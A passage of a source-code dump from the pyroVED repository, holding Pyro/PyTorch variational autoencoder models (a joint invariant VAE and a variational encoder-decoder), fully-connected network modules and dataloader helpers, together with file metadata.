leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is 'tanh').\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True).\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed).\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n\n Examples:\n\n Initialize a joint VAE model with rotational invariance for 10 discrete classes\n\n >>> data_dim = (28, 28)\n >>> jrvae = jiVAE(data_dim, latent_dim=2, discrete_dim=10, invariances=['r'])\n \"\"\"\n\n def __init__(self,\n data_dim: Tuple[int],\n latent_dim: int,\n discrete_dim: int,\n invariances: List[str] = None,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes j-iVAE's modules and parameters\n \"\"\"\n args = (data_dim, invariances)\n super(jiVAE, self).__init__(*args, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n self.data_dim = data_dim\n\n # Initialize the Encoder NN\n self.encoder_z = jfcEncoderNet(\n data_dim, latent_dim+self.coord, discrete_dim, hidden_dim_e,\n num_layers_e, activation, softplus_out=True)\n\n # Initialize the Decoder NN\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, discrete_dim, hidden_dim_d,\n num_layers_d, activation, sigmoid_out=sigmoid_d, unflat=False)\n\n # Initialize the decoder's sampler\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Set continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.discrete_dim = discrete_dim\n\n # Move model parameters to appropriate device\n self.to(self.device)\n\n def model(self,\n x: torch.Tensor,\n **kwargs: float) -> None:\n \"\"\"\n Defines the model p(x|z,c)p(z)p(c)\n \"\"\"\n # register PyTorch module `decoder` with Pyro\n pyro.module(\"decoder\", self.decoder)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", [1., 1.])\n if isinstance(beta, (float, int, list)):\n beta = torch.tensor(beta)\n if beta.ndim == 0:\n beta = torch.tensor([beta, beta])\n reshape_ = torch.prod(tt(x.shape[1:])).item()\n bdim = x.shape[0]\n with pyro.plate(\"data\"):\n # sample the continuous latent vector from the constant prior distribution\n z_loc = x.new_zeros(torch.Size((bdim, self.z_dim)))\n z_scale = x.new_ones(torch.Size((bdim, self.z_dim)))\n # sample discrete latent vector from the constant prior\n alpha = x.new_ones(torch.Size((bdim, self.discrete_dim))) / self.discrete_dim\n # sample from prior (value will be sampled by guide when computing ELBO)\n with pyro.poutine.scale(scale=beta[0]):\n z = pyro.sample(\"latent_cont\", dist.Normal(z_loc, z_scale).to_event(1))\n with pyro.poutine.scale(scale=beta[1]):\n z_disc = pyro.sample(\"latent_disc\", dist.OneHotCategorical(alpha))\n # split latent variable into parts for rotation and/or translation\n # and image content\n if self.coord > 0:\n phi, dx, sc, z = self.split_latent(z.repeat(self.discrete_dim, 1))\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n grid = self.grid.expand(bdim*self.discrete_dim, *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # Continuous and discrete latent variables for the decoder\n z = [z, z_disc.reshape(-1, self.discrete_dim) if self.coord > 0 else z_disc]\n # decode the latent code z together with the transformed coordinates (if any)\n dec_args = (x_coord_prime, z) if self.coord else (z,)\n loc = self.decoder(*dec_args)\n # score against actual images/spectra\n loc = loc.view(*z_disc.shape[:-1], reshape_)\n pyro.sample(\n \"obs\", self.sampler_d(loc).to_event(1),\n obs=x.view(-1, reshape_))\n\n def guide(self,\n x: torch.Tensor,\n **kwargs: float) -> None:\n \"\"\"\n Defines the guide q(z,c|x)\n \"\"\"\n # register PyTorch module `encoder_z` with Pyro\n pyro.module(\"encoder_z\", self.encoder_z)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", [1., 1.])\n if isinstance(beta, (float, int, list)):\n beta = torch.tensor(beta)\n if beta.ndim == 0:\n beta = torch.tensor([beta, beta])\n with pyro.plate(\"data\"):\n # use the encoder to get the parameters used to define q(z,c|x)\n z_loc, z_scale, alpha = self.encoder_z(x)\n # sample the latent code z\n with pyro.poutine.scale(scale=beta[0]):\n pyro.sample(\"latent_cont\", dist.Normal(z_loc, z_scale).to_event(1))\n with pyro.poutine.scale(scale=beta[1]):\n pyro.sample(\"latent_disc\", dist.OneHotCategorical(alpha))\n\n def split_latent(self, z: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts with rotation and/or translation\n and image content\n \"\"\"\n return self._split_latent(z)\n\n def encode(self,\n x_new: torch.Tensor,\n logits: bool = False,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained j-iVAE. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n logits:\n Return raw class probabilities (Default: False).\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data).\n \"\"\"\n z = self._encode(x_new)\n z_loc = z[:, :self.z_dim]\n z_scale = z[:, self.z_dim:2*self.z_dim]\n classes = z[:, 2*self.z_dim:]\n if not logits:\n _, classes = torch.max(classes, 1)\n return z_loc, z_scale, classes\n\n def decode(self, z: torch.Tensor, y: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordinates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Classes as one-hot vectors for each sample in z\n \"\"\"\n z = torch.cat([z.to(self.device), y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc.view(-1, *self.data_dim)\n\n def manifold2d(self, d: int, disc_idx: int = 0, plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Plots a learned latent manifold in the data space\n\n Args:\n d: Grid size\n disc_idx: Discrete dimension for which we plot continuous latent manifolds\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. z_coord = [-3, 3, -3, 3]),\n 'angle' and 'shift' to condition a generative model on,\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n z_disc = to_onehot(tt(disc_idx).unsqueeze(0), self.discrete_dim)\n z_disc = z_disc.repeat(z.shape[0], 1)\n loc = self.decode(z, z_disc, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n\n def manifold_traversal(self, d: int, cont_idx: int, cont_idx_fixed: int = 0,\n plot: bool = True, **kwargs: Union[str, int, float]\n ) -> torch.Tensor:\n \"\"\"\n Latent space traversal for joint continuous and discrete\n latent representations\n\n Args:\n d: Grid size\n cont_idx:\n Continuous latent variable used for plotting\n a latent manifold traversal\n cont_idx_fixed:\n Value which the remaining continuous latent variables are fixed at\n plot:\n Plots the generated manifold (Default: True)\n kwargs:\n Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. z_coord = [-3, 3, -3, 3]),\n 'angle' and 'shift' to condition a generative model one,\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n num_samples = d**2\n disc_dim = self.discrete_dim\n cont_dim = self.z_dim - self.coord\n data_dim = self.data_dim\n # Get continuous and discrete latent coordinates\n samples_cont, samples_disc = generate_latent_grid_traversal(\n d, cont_dim, disc_dim, cont_idx, cont_idx_fixed, num_samples)\n # Pass discrete and continuous latent coordinates through a decoder\n decoded = self.decode(samples_cont, samples_disc, **kwargs)\n if plot:\n plot_grid_traversal(decoded, d, data_dim, disc_dim, **kwargs)\n return decoded\n" }, { "alpha_fraction": 0.5421316623687744, "alphanum_fraction": 0.5489915013313293, "avg_line_length": 39.028690338134766, "blob_id": "7cf51c76ce37cecbd6259a5234066d451ca77083", "content_id": "e7f135b7d20c9f85efdba15cd5ae13fd80c204f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9767, "license_type": "permissive", "max_line_length": 94, "num_lines": 244, "path": "/pyroved/models/ved.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nved.py\n=========\n\nVariational encoder-decoder model (input and output are different)\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Tuple, Union, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom .base import baseVAE\nfrom ..nets import convEncoderNet, convDecoderNet\nfrom ..utils import (generate_latent_grid, get_sampler,\n init_dataloader, plot_img_grid, plot_spect_grid,\n set_deterministic_mode)\n\n\nclass VED(baseVAE):\n \"\"\"\n Variational encoder-decoder model where the inputs and outputs are not identical.\n This model can be used for realizing im2spec and spec2im type of models where\n 1D spectra are predicted from image data and vice versa.\n\n Args:\n input_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra.\n output_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra. Doesn't have to match the input data.\n input_channels:\n Number of input channels (Default: 1)\n output_channels:\n Number of output channels (Default: 1)\n latent_dim:\n Number of latent dimensions.\n hidden_dim_e:\n Number of hidden units (convolutional filters) for each layer in\n the first block of the encoder NN. The number of units in the\n consecutive blocks is defined as hidden_dim_e * n,\n where n = 2, 3, ..., n_blocks (Default: 32).\n hidden_dim_d:\n Number of hidden units (convolutional filters) for each layer in\n the first block of the decoder NN. The number of units in the\n consecutive blocks is defined as hidden_dim_e // n,\n where n = 2, 3, ..., n_blocks (Default: 96).\n num_layers_e:\n List with numbers of layers per each block of the encoder NN.\n Defaults to [1, 2, 2] if none is specified.\n num_layers_d:\n List with numbers of layers per each block of the decoder NN.\n Defaults to [2, 2, 1] if none is specified.\n activation:\n activation:\n Non-linear activation for inner layers of encoder and decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is 'lrelu').\n batchnorm:\n Batch normalization attached to each convolutional layer\n after non-linear activation (except for layers with 1x1 filters)\n in the encoder and decoder NNs (Default: False)\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True)\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed)\n kwargs:\n Additional keyword argument is *decoder_sig* for setting sigma\n in the decoder's sampler when it is chosen to be a \"gaussian\".\n\n Examples:\n\n Initialize a VED model for predicting 1D spectra from 2D images\n\n >>> input_dim = (32, 32) # image height and width\n >>> output_dim = (16,) # spectrum length\n >>> ved = VED(input_dim, output_dim, latent_dim=2)\n \"\"\"\n def __init__(self,\n input_dim: Tuple[int],\n output_dim: Tuple[int],\n input_channels: int = 1,\n output_channels: int = 1,\n latent_dim: int = 2,\n hidden_dim_e: int = 32,\n hidden_dim_d: int = 96,\n num_layers_e: List[int] = None,\n num_layers_d: List[int] = None,\n activation: str = \"lrelu\",\n batchnorm: bool = False,\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: float\n ) -> None:\n \"\"\"\n Initializes VED's modules and parameters\n \"\"\"\n super(VED, self).__init__(output_dim, None, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.ndim = len(output_dim)\n self.encoder_z = convEncoderNet(\n input_dim, input_channels, latent_dim,\n num_layers_e, hidden_dim_e,\n batchnorm, activation)\n self.decoder = convDecoderNet(\n latent_dim, output_dim, output_channels,\n num_layers_d, hidden_dim_d,\n batchnorm, activation, sigmoid_d)\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n self.z_dim = latent_dim\n self.to(self.device)\n\n def model(self,\n x: torch.Tensor = None,\n y: torch.Tensor = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the model p(y|z)p(z)\n \"\"\"\n # register PyTorch module `decoder` with Pyro\n pyro.module(\"decoder\", self.decoder)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\", x.shape[0]):\n # setup hyperparameters for prior p(z)\n z_loc = x.new_zeros(torch.Size((x.shape[0], self.z_dim)))\n z_scale = x.new_ones(torch.Size((x.shape[0], self.z_dim)))\n # sample from prior (value will be sampled by guide when computing the ELBO)\n with pyro.poutine.scale(scale=beta):\n z = pyro.sample(\"z\", dist.Normal(z_loc, z_scale).to_event(1))\n # decode the latent code z\n loc = self.decoder(z)\n # score against actual images\n pyro.sample(\n \"obs\", self.sampler_d(loc.flatten(1)).to_event(1),\n obs=y.flatten(1))\n\n def guide(self,\n x: torch.Tensor = None,\n y: torch.Tensor = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the guide q(z|x)\n \"\"\"\n # register PyTorch module `encoder_z` with Pyro\n pyro.module(\"encoder_z\", self.encoder_z)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\", x.shape[0]):\n # use the encoder to get the parameters used to define q(z|x)\n z_loc, z_scale = self.encoder_z(x)\n # sample the latent code z\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"z\", dist.Normal(z_loc, z_scale).to_event(1))\n\n def encode(self, x_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained trVAE. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n self.eval()\n z = self._encode(x_new)\n z_loc, z_scale = z.split(self.z_dim, 1)\n return z_loc, z_scale\n\n def decode(self,\n z: torch.Tensor,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordnates\n\n Args:\n z: Latent coordinates\n \"\"\"\n self.eval()\n z = z.to(self.device)\n loc = self._decode(z, **kwargs)\n return loc\n\n def predict(self, x_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"Forward prediction (encode -> sample -> decode)\"\"\"\n\n def forward_(x_i) -> torch.Tensor:\n with torch.no_grad():\n encoded = self.encoder_z(x_i)\n encoded = torch.cat(encoded, -1)\n z_mu, z_sig = encoded.split(self.z_dim, 1)\n z_samples = dist.Normal(z_mu, z_sig).rsample(sample_shape=(30,))\n y = torch.cat([self.decoder(z)[None] for z in z_samples])\n return y.mean(0).cpu(), y.std(0).cpu()\n\n x_new = init_dataloader(x_new, shuffle=False, **kwargs)\n prediction_mu, prediction_sd = [], []\n for (x_i,) in x_new:\n y_mu, y_sd = forward_(x_i.to(self.device))\n prediction_mu.append(y_mu)\n prediction_sd.append(y_sd)\n return torch.cat(prediction_mu), torch.cat(prediction_sd)\n\n def manifold2d(self, d: int, plot: bool = True,\n **kwargs: Union[str, int]) -> torch.Tensor:\n \"\"\"\n Plots a learned latent manifold in the image space\n\n Args:\n d: Grid size\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. z_coord = [-3, 3, -3, 3])\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n self.eval()\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n z = z.to(self.device)\n with torch.no_grad():\n loc = self.decoder(z).cpu()\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n" }, { "alpha_fraction": 0.7001827955245972, "alphanum_fraction": 0.7001827955245972, "avg_line_length": 48.727272033691406, "blob_id": "b7d3f60035e4c0e097764f242d84b1eaf3e83b0f", "content_id": "51449170806ab1e7298553d83c94e8fe46358a20", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 547, "license_type": "permissive", "max_line_length": 79, "num_lines": 11, "path": "/pyroved/nets/__init__.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nFully-connected and convolutional neural network modules\n\"\"\"\nfrom .conv import (ConvBlock, FeatureExtractor, UpsampleBlock, Upsampler,\n convDecoderNet, convEncoderNet)\nfrom .fc import (fcClassifierNet, fcDecoderNet, fcEncoderNet, jfcEncoderNet,\n sDecoderNet, fcRegressorNet)\n\n__all__ = [\"fcEncoderNet\", \"fcDecoderNet\", \"sDecoderNet\", \"fcRegressorNet\",\n \"fcClassifierNet\", \"jfcEncoderNet\", \"ConvBlock\", \"UpsampleBlock\",\n \"FeatureExtractor\", \"Upsampler\", \"convEncoderNet\", \"convDecoderNet\"]\n" }, { "alpha_fraction": 0.5034521222114563, "alphanum_fraction": 0.513155460357666, "avg_line_length": 30.804153442382812, "blob_id": "5f1042edf3ef001421f051cee72746dc9506eb57", "content_id": "4c155554326d0b2dade64d40e042df723739b5d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10718, "license_type": "permissive", "max_line_length": 90, "num_lines": 337, "path": "/pyroved/nets/fc.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nfc.py\n\nModule for creating fully-connected encoder and decoder modules\n\nCreated by Maxim Ziatdinov ([email protected])\n\"\"\"\n\nfrom typing import List, Tuple, Type, Union\n\nimport torch\nimport torch.nn as nn\nfrom pyro.distributions.util import broadcast_shape\n\nfrom ..utils import get_activation\n\ntt = torch.tensor\n\n\nclass Concat(nn.Module):\n \"\"\"\n Module for concatenation of tensors\n \"\"\"\n def __init__(self, allow_broadcast: bool = True):\n \"\"\"\n Initializes module\n \"\"\"\n self.allow_broadcast = allow_broadcast\n super().__init__()\n\n def forward(self, input_args: Union[List[torch.Tensor], torch.Tensor]\n ) -> torch.Tensor:\n \"\"\"\n Performs concatenation\n \"\"\"\n if torch.is_tensor(input_args):\n return input_args\n if self.allow_broadcast:\n shape = broadcast_shape(*[s.shape[:-1] for s in input_args]) + (-1,)\n input_args = [s.expand(shape) for s in input_args]\n out = torch.cat(input_args, dim=-1)\n return out\n\n\nclass fcEncoderNet(nn.Module):\n \"\"\"\n Standard fully-connected encoder NN for VAE.\n The encoder outputs mean and standard evidation of the encoded distribution.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n latent_dim: int = 2,\n c_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n softplus_out: bool = True,\n flat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcEncoderNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item() + c_dim\n self.flat = flat\n\n self.concat = Concat()\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.fc11 = nn.Linear(hidden_dim, latent_dim)\n self.fc12 = nn.Linear(hidden_dim, latent_dim)\n self.activation_out = nn.Softplus() if softplus_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.concat(x)\n if self.flat:\n x = x.view(-1, self.in_dim)\n x = self.fc_layers(x)\n mu = self.fc11(x)\n sigma = self.activation_out(self.fc12(x))\n return mu, sigma\n\n\nclass jfcEncoderNet(nn.Module):\n \"\"\"\n Fully-connected encoder for joint VAE.\n The encoder outputs mean, standard evidation and class probabilities.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n latent_dim: int = 2,\n discrete_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n softplus_out: bool = True,\n flat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(jfcEncoderNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item()\n self.flat = flat\n\n self.concat = Concat()\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.fc11 = nn.Linear(hidden_dim, latent_dim)\n self.fc12 = nn.Linear(hidden_dim, latent_dim)\n self.fc13 = nn.Linear(hidden_dim, discrete_dim)\n self.activation_out = nn.Softplus() if softplus_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.concat(x)\n if self.flat:\n x = x.view(-1, self.in_dim)\n x = self.fc_layers(x)\n mu = self.fc11(x)\n sigma = self.activation_out(self.fc12(x))\n alpha = torch.softmax(self.fc13(x), dim=-1)\n return mu, sigma, alpha\n\n\nclass fcDecoderNet(nn.Module):\n \"\"\"\n Standard fully-connected decoder for VAE\n \"\"\"\n def __init__(self,\n out_dim: Tuple[int],\n latent_dim: int,\n c_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n sigmoid_out: bool = True,\n unflat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcDecoderNet, self).__init__()\n if len(out_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.unflat = unflat\n if self.unflat:\n self.reshape = out_dim\n out_dim = torch.prod(tt(out_dim)).item()\n\n self.concat = Concat()\n self.fc_layers = make_fc_layers(\n latent_dim+c_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, out_dim)\n self.activation_out = nn.Sigmoid() if sigmoid_out else lambda x: x\n\n def forward(self, z: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n z = self.concat(z)\n x = self.fc_layers(z)\n x = self.activation_out(self.out(x))\n if self.unflat:\n return x.view(-1, *self.reshape)\n return x\n\n\nclass sDecoderNet(nn.Module):\n \"\"\"\n Spatial generator (decoder) network with fully-connected layers\n \"\"\"\n def __init__(self,\n out_dim: Tuple[int],\n latent_dim: int,\n c_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n sigmoid_out: bool = True,\n unflat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(sDecoderNet, self).__init__()\n if len(out_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.unflat = unflat\n if self.unflat:\n self.reshape = out_dim\n coord_dim = 1 if len(out_dim) < 2 else 2\n\n self.concat = Concat()\n self.coord_latent = coord_latent(\n latent_dim+c_dim, hidden_dim, coord_dim)\n self.fc_layers = make_fc_layers(\n hidden_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, 1) # need to generalize to multi-channel (c > 1)\n self.activation_out = nn.Sigmoid() if sigmoid_out else lambda x: x\n\n def forward(self, x_coord: torch.Tensor, z: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n z = self.concat(z)\n x = self.coord_latent(x_coord, z)\n x = self.fc_layers(x)\n x = self.activation_out(self.out(x))\n if self.unflat:\n return x.view(-1, *self.reshape)\n return x\n\n\nclass coord_latent(nn.Module):\n \"\"\"\n The \"spatial\" part of the trVAE's decoder that allows for translational\n and rotational invariance (based on https://arxiv.org/abs/1909.11663)\n \"\"\"\n def __init__(self,\n latent_dim: int,\n out_dim: int,\n ndim: int = 2,\n activation_out: bool = True) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(coord_latent, self).__init__()\n self.fc_coord = nn.Linear(ndim, out_dim)\n self.fc_latent = nn.Linear(latent_dim, out_dim, bias=False)\n self.activation = nn.Tanh() if activation_out else None\n\n def forward(self,\n x_coord: torch.Tensor,\n z: Tuple[torch.Tensor]) -> torch.Tensor:\n batch_dim, n = x_coord.size()[:2]\n x_coord = x_coord.reshape(batch_dim * n, -1)\n h_x = self.fc_coord(x_coord)\n h_x = h_x.reshape(batch_dim, n, -1)\n h_z = self.fc_latent(z)\n\n h_z = h_z.view(-1, h_z.size(-1))\n h = h_x.add(h_z.unsqueeze(1))\n h = h.reshape(batch_dim * n, -1)\n if self.activation is not None:\n h = self.activation(h)\n return h\n\n\nclass fcClassifierNet(nn.Module):\n \"\"\"\n Simple classification neural network with fully-connected layers only.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n num_classes: int,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh'\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcClassifierNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item()\n\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, num_classes)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.fc_layers(x)\n x = self.out(x)\n return torch.softmax(x, dim=-1)\n\n\nclass fcRegressorNet(nn.Module):\n \"\"\"\n Simple classification neural network with fully-connected layers only.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n c_dim: int,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh'\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcRegressorNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item()\n\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, c_dim)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.fc_layers(x)\n return self.out(x)\n\n\ndef make_fc_layers(in_dim: int,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = \"tanh\"\n ) -> Type[nn.Module]:\n \"\"\"\n Generates a module with stacked fully-connected (aka dense) layers\n \"\"\"\n fc_layers = []\n for i in range(num_layers):\n hidden_dim_ = in_dim if i == 0 else hidden_dim\n fc_layers.extend(\n [nn.Linear(hidden_dim_, hidden_dim),\n get_activation(activation)()])\n fc_layers = nn.Sequential(*fc_layers)\n return fc_layers\n" }, { "alpha_fraction": 0.6146341562271118, "alphanum_fraction": 0.6162601709365845, "avg_line_length": 37.4375, "blob_id": "e533c5f0edeaa5e861463ba44cb4018093d36be6", "content_id": "f23bfb1e4e75a440bf3245a5cb366c8e58e77253", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1845, "license_type": "permissive", "max_line_length": 81, "num_lines": 48, "path": "/pyroved/utils/data.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Tuple, Type\n\nimport torch\n\n\ndef init_dataloader(*args: torch.Tensor,\n random_sampler: bool = False,\n shuffle: bool = True,\n **kwargs: int\n ) -> Type[torch.utils.data.DataLoader]:\n \"\"\"\n Returns initialized PyTorch dataloader, which is used by pyroVED's trainers.\n The inputs are torch Tensor objects containing training data and (optionally)\n labels.\n\n Example:\n\n >>> # Load training data stored as numpy array\n >>> train_data = np.load(\"my_training_data.npy\")\n >>> # Transform numpy array to toech Tensor object\n >>> train_data = torch.from_numpy(train_data).float()\n >>> # Initialize dataloader\n >>> train_loader = init_dataloader(train_data)\n \"\"\"\n batch_size = kwargs.get(\"batch_size\", 100)\n tensor_set = torch.utils.data.dataset.TensorDataset(*args)\n if random_sampler:\n sampler = torch.utils.data.RandomSampler(tensor_set)\n data_loader = torch.utils.data.DataLoader(\n dataset=tensor_set, batch_size=batch_size, sampler=sampler)\n else:\n data_loader = torch.utils.data.DataLoader(\n dataset=tensor_set, batch_size=batch_size, shuffle=shuffle)\n return data_loader\n\n\ndef init_ssvae_dataloaders(data_unsup: torch.Tensor,\n data_sup: Tuple[torch.Tensor],\n data_val: Tuple[torch.Tensor],\n **kwargs: int\n ) -> Tuple[Type[torch.utils.data.DataLoader]]:\n \"\"\"\n Helper function to initialize dataloader for ss-VAE models\n \"\"\"\n loader_unsup = init_dataloader(data_unsup, **kwargs)\n loader_sup = init_dataloader(*data_sup, sampler=True, **kwargs)\n loader_val 